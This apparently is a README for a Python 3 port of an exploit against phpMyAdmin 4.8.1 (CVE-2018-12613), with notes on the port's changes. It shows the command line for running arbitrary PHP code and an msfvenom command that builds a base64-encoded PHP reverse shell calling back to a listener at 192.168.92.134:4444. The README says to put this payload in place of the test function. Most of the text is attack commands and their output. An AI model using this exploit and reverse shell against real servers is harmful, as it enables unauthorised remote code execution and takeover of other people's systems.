Modified standalone exploit ported to Python 3. Tested on Python 3.7.3 with phpMyAdmin 4.8.1 running on Ubuntu 16.04. Works on Linux only. Original exploit by SSD. All credits to them.
- Added function to exit if provided phpMyAdmin username/password is correct
- Added function to check if version is vulnerable (4.8.0 or 4.8.1)
- Converted variables strictly to either bytes or strings; Python 3 disallows mixing the two.
python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] -P "phpcredits();"
Results of the PHP code are stored in results.html.
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php
Use the msfvenom PHP payload in place of phpcredits(); above.
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php
eval(base64_decode(ICAg...gfQo));